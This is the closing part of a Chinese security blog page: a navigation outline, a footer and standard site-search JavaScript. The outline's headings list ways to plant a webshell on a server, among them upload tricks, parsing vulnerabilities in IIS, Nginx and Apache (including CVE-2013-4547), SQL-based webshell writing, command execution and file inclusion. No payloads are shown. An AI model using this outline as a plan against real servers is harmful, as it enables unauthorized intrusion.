href="#5、-上传其他脚本类型getshell"><span class="nav-number">2.1.5.</span> <span class="nav-text">5、 上传其他脚本类型getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6、-各类解析漏洞"><span class="nav-number">2.1.6.</span> <span class="nav-text">6、 各类解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#IIS6-0解析漏洞"><span class="nav-number">2.1.6.1.</span> <span class="nav-text">IIS6.0解析漏洞</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#IIS7-0-7-5、Nginx-lt-8-0解析漏洞"><span class="nav-number">2.1.6.2.</span> <span class="nav-text">IIS7.0&#x2F;7.5、Nginx&lt;8.0解析漏洞</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Nginx-lt-8-03空字节代码执行漏洞"><span class="nav-number">2.1.6.3.</span> <span class="nav-text">Nginx&lt;8.03空字节代码执行漏洞</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Apache解析漏洞"><span class="nav-number">2.1.6.4.</span> <span class="nav-text">Apache解析漏洞</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#CVE-2013-4547-Nginx解析漏洞"><span class="nav-number">2.1.6.5.</span> <span class="nav-text">CVE-2013-4547 Nginx解析漏洞</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7、-编辑器漏洞getshell"><span class="nav-number">2.1.7.</span> <span class="nav-text">7、 编辑器漏洞getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8、-网站配置插马"><span class="nav-number">2.1.8.</span> <span class="nav-text">8、 网站配置插马</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#9、-执行sql语句写入webshell"><span class="nav-number">2.1.9.</span> <span class="nav-text">9、 执行sql语句写入webshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#10、-命令执行Getshell"><span class="nav-number">2.1.10.</span> <span class="nav-text">10、 命令执行Getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Windows"><span class="nav-number">2.1.10.1.</span> <span class="nav-text">Windows</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Linux"><span class="nav-number">2.1.10.2.</span> <span class="nav-text">Linux</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#11、-文件包含Getshell"><span class="nav-number">2.1.11.</span> <span class="nav-text">11、 文件包含Getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#asp包含"><span class="nav-number">2.1.11.1.</span> <span class="nav-text">asp包含</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#php包含"><span class="nav-number">2.1.11.2.</span> <span class="nav-text">php包含</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#12、-数据库命令执行getshell"><span class="nav-number">2.1.12.</span> <span class="nav-text">12、 数据库命令执行getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Access导出"><span class="nav-number">2.1.12.1.</span> <span class="nav-text">Access导出</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Sqlserver导出"><span class="nav-number">2.1.12.2.</span> <span class="nav-text">Sqlserver导出</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Mysql导出"><span class="nav-number">2.1.12.3.</span> <span class="nav-text">Mysql导出</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二、-不进后台getshell"><span class="nav-number">2.2.</span> <span class="nav-text">二、 不进后台getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、-0day-Getshell"><span class="nav-number">2.2.1.</span> <span class="nav-text">1、 0day Getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、-写入日志getshell"><span class="nav-number">2.2.2.</span> <span class="nav-text">2、 写入日志getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、-IIS-Tomcat写权限getshell"><span class="nav-number">2.2.3.</span> <span class="nav-text">3、 IIS&#x2F;Tomcat写权限getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-、-注入漏洞getshell"><span class="nav-number">2.2.4.</span> <span class="nav-text">4 、 注入漏洞getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5、-远程命令执行"><span class="nav-number">2.2.5.</span> <span class="nav-text">5、 远程命令执行</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <!--
<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-id-card"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Virusday</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">90.8k</span>
  
</div>
-->


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Virusday</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>









        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
